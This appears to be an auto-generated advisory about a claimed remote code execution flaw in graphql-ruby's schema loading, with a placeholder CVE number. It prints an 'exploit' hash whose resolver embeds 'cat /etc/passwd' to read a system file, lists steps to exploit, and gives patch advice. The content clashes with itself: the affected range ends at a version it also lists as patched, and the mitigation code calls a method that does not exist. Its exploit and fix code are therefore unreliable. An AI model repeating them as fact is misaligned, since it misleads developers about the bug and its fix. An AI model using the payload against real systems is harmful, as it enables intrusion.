How the CVE Works:
The vulnerability (CVE-2025-XXXX) in GraphQL arises when a maliciously crafted GraphQL schema is loaded using `GraphQL::Schema.from_introspection` or GraphQL::Schema::Loader.load. This allows an attacker to execute arbitrary code remotely. The issue stems from improper validation of schema definitions during the loading process, enabling attackers to inject and execute malicious code. Systems that load schemas from untrusted JSON sources, such as those using `GraphQL::Client` for external schema introspection, are particularly vulnerable. This can lead to full system compromise, data breaches, or unauthorized access.
DailyCVE Form:
Platform: GraphQL-Ruby
Version: 1.11.5-2.4.13
Vulnerability: Remote Code Execution
Severity: Critical
Date: Mar 12, 2025
What Undercode Say:
Exploitation:
1. Exploit Code Example:
malicious_schema = {
"data" => {
"__schema" => {
"types" => [
{
"name" => "MaliciousType",
"fields" => [
{
"name" => "exploit",
"args" => [],
"type" => { "name" => "String" },
"resolve" => "<code>cat /etc/passwd</code>"
}
]
}
]
}
}
}
schema = GraphQL::Schema.from_introspection(malicious_schema)
2. Steps to Exploit:
- Craft a malicious schema with embedded code execution payloads.
- Load the schema using
GraphQL::Schema.from_introspection. - Trigger the malicious resolver to execute arbitrary commands.
Protection:
1. Update to Patched Versions:
- Upgrade to `graphql-ruby` versions 2.4.13, 2.3.21, 2.2.17, 2.1.14, 2.0.32, 1.13.24, 1.12.25, or 1.11.8.
2. Input Validation:
- Validate and sanitize all schema inputs before processing.
- Avoid loading schemas from untrusted sources.
3. Mitigation Code:
def safe_load_schema(schema_json) raise "Untrusted source!" unless schema_json.trusted? GraphQL::Schema.from_introspection(schema_json) end
4. Monitoring:
- Monitor logs for unusual schema loading activities.
- Use intrusion detection systems to flag suspicious behavior.
5. Commands:
- Check installed version: `gem list graphql`
– Update gem: `gem update graphql`
– Verify patch: `bundle update graphql`
